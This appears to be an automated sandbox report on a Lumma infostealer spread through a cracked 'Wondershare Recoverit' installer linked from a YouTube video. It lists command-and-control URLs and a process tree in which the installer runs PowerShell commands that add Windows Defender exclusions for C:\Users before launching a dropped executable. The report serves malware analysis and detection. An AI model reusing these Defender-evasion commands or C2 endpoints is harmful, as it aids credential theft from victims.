Analysis

  • max time kernel
    182s
  • max time network
    183s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-01-2025 22:18

General

  • Target

    https://youtu.be/uL_USmYHfsA?si=UxQ7X85fi_EYU85C

Malware Config

Extracted

Family

lumma

C2

https://cloudewahsj.shop/api

https://rabidcowse.shop/api

https://noisycuttej.shop/api

https://tirepublicerj.shop/api

https://framekgirus.shop/api

https://wholersorie.shop/api

https://abruptyopsn.shop/api

https://nearycrepso.shop/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 12 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://youtu.be/uL_USmYHfsA?si=UxQ7X85fi_EYU85C
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3984
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc6346cc40,0x7ffc6346cc4c,0x7ffc6346cc58
      2⤵
        PID:3532
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=372,i,4524144975405650263,17868503340226125801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1736 /prefetch:2
        2⤵
          PID:1352
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,4524144975405650263,17868503340226125801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2172 /prefetch:3
          2⤵
            PID:4240
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,4524144975405650263,17868503340226125801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2220 /prefetch:8
            2⤵
              PID:944
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,4524144975405650263,17868503340226125801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3136 /prefetch:1
              2⤵
                PID:2676
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,4524144975405650263,17868503340226125801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:1
                2⤵
                  PID:4816
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4376,i,4524144975405650263,17868503340226125801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4392 /prefetch:1
                  2⤵
                    PID:1916
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4624,i,4524144975405650263,17868503340226125801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3300 /prefetch:1
                    2⤵
                      PID:1640
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4808,i,4524144975405650263,17868503340226125801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:8
                      2⤵
                        PID:2856
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3672,i,4524144975405650263,17868503340226125801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:8
                        2⤵
                        • Modifies registry class
                        PID:4916
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5016,i,4524144975405650263,17868503340226125801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5380 /prefetch:8
                        2⤵
                          PID:1624
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5128,i,4524144975405650263,17868503340226125801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5136 /prefetch:1
                          2⤵
                            PID:3024
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5824,i,4524144975405650263,17868503340226125801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5844 /prefetch:1
                            2⤵
                              PID:3668
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5792,i,4524144975405650263,17868503340226125801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4912 /prefetch:8
                              2⤵
                                PID:2776
                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                              1⤵
                                PID:736
                              • C:\Windows\system32\AUDIODG.EXE
                                C:\Windows\system32\AUDIODG.EXE 0x4f0 0x4e4
                                1⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2956
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                1⤵
                                  PID:2148
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:5076
                                  • C:\Program Files\7-Zip\7zG.exe
                                    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Wondershare Recoverit 13.0.2.9 Multilingual\" -spe -an -ai#7zMap28297:148:7zEvent18739
                                    1⤵
                                    • Suspicious use of FindShellTrayWindow
                                    PID:4060
                                  • C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Setup.exe
                                    "C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Setup.exe"
                                    1⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:3744
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\xiIszhnfYL'
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1516
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4140
                                    • C:\xiIszhnfYL\nvtiskfjthawsd.exe
                                      "C:\xiIszhnfYL\nvtiskfjthawsd.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of SetWindowsHookEx
                                      PID:4892
                                  • C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Setup.exe
                                    "C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Setup.exe"
                                    1⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:4884
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\tPjqthjtVb'
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1828
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1140
                                    • C:\tPjqthjtVb\nvtiskfjthawsd.exe
                                      "C:\tPjqthjtVb\nvtiskfjthawsd.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of SetWindowsHookEx
                                      PID:4524
                                  • C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Setup.exe
                                    "C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Setup.exe"
                                    1⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:1316
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\KGDCuaQGUP'
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4308
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:536
                                    • C:\KGDCuaQGUP\nvtiskfjthawsd.exe
                                      "C:\KGDCuaQGUP\nvtiskfjthawsd.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of SetWindowsHookEx
                                      PID:652
                                  • C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Setup.exe
                                    "C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Setup.exe"
                                    1⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:3820
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\ODYBTnEZ'
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2628
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3028
                                    • C:\ODYBTnEZ\nvtiskfjthawsd.exe
                                      "C:\ODYBTnEZ\nvtiskfjthawsd.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of SetWindowsHookEx
                                      PID:3488
                                  • C:\Program Files\7-Zip\7zG.exe
                                    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\" -an -ai#7zMap132:156:7zEvent20475
                                    1⤵
                                    • Suspicious use of FindShellTrayWindow
                                    PID:3228
                                  • C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Setup.exe
                                    "C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Setup.exe"
                                    1⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:4068
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\TktoTQxfTu'
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3772
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:5116
                                    • C:\TktoTQxfTu\nvtiskfjthawsd.exe
                                      "C:\TktoTQxfTu\nvtiskfjthawsd.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2692
                                  • C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Setup.exe
                                    "C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Setup.exe"
                                    1⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:3008
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\tyzvl'
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1700
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2672
                                    • C:\tyzvl\nvtiskfjthawsd.exe
                                      "C:\tyzvl\nvtiskfjthawsd.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of SetWindowsHookEx
                                      PID:4892

                                  Network

                                  • flag-us
                                    DNS
                                    youtu.be
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    youtu.be
                                    IN A
                                    Response
                                    youtu.be
                                    IN A
                                    142.250.180.14
                                  • flag-us
                                    DNS
                                    youtu.be
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    youtu.be
                                    IN A
                                  • flag-gb
                                    GET
                                    https://youtu.be/uL_USmYHfsA?si=UxQ7X85fi_EYU85C
                                    chrome.exe
                                    Remote address:
                                    142.250.180.14:443
                                    Request
                                    GET /uL_USmYHfsA?si=UxQ7X85fi_EYU85C HTTP/2.0
                                    host: youtu.be
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-fetch-site: none
                                    sec-fetch-mode: navigate
                                    sec-fetch-user: ?1
                                    sec-fetch-dest: document
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    www.youtube.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    www.youtube.com
                                    IN A
                                    Response
                                    www.youtube.com
                                    IN CNAME
                                    youtube-ui.l.google.com
                                    youtube-ui.l.google.com
                                    IN A
                                    172.217.169.78
                                    youtube-ui.l.google.com
                                    IN A
                                    216.58.212.206
                                    youtube-ui.l.google.com
                                    IN A
                                    216.58.201.110
                                    youtube-ui.l.google.com
                                    IN A
                                    172.217.16.238
                                    youtube-ui.l.google.com
                                    IN A
                                    142.250.200.14
                                    youtube-ui.l.google.com
                                    IN A
                                    142.250.187.238
                                    youtube-ui.l.google.com
                                    IN A
                                    172.217.169.46
                                    youtube-ui.l.google.com
                                    IN A
                                    142.250.200.46
                                    youtube-ui.l.google.com
                                    IN A
                                    142.250.179.238
                                    youtube-ui.l.google.com
                                    IN A
                                    142.250.180.14
                                    youtube-ui.l.google.com
                                    IN A
                                    216.58.213.14
                                    youtube-ui.l.google.com
                                    IN A
                                    142.250.178.14
                                    youtube-ui.l.google.com
                                    IN A
                                    216.58.204.78
                                    youtube-ui.l.google.com
                                    IN A
                                    216.58.212.238
                                    youtube-ui.l.google.com
                                    IN A
                                    172.217.169.14
                                    youtube-ui.l.google.com
                                    IN A
                                    142.250.187.206
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be HTTP/2.0
                                    host: www.youtube.com
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: none
                                    sec-fetch-mode: navigate
                                    sec-fetch-user: ?1
                                    sec-fetch-dest: document
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/player/3ede36f2/player_ias.vflset/en_US/base.js
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/player/3ede36f2/player_ias.vflset/en_US/base.js HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/desktop/b5305900/jsbin/desktop_polymer.vflset/desktop_polymer.js
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/desktop/b5305900/jsbin/desktop_polymer.vflset/desktop_polymer.js HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/desktop/b5305900/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/desktop/b5305900/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-YEC=CgtXWEt3X0hQX19sMCjh_5C8BjIKCgJHQhIEGgAgFA%3D%3D
                                    cookie: YSC=l9hGfoshAvA
                                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFA%3D%3D
                                  • flag-gb
                                    GET
                                    https://www.youtube.com/s/desktop/b5305900/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /s/desktop/b5305900/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js HTTP/2.0
                                    host: www.youtube.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
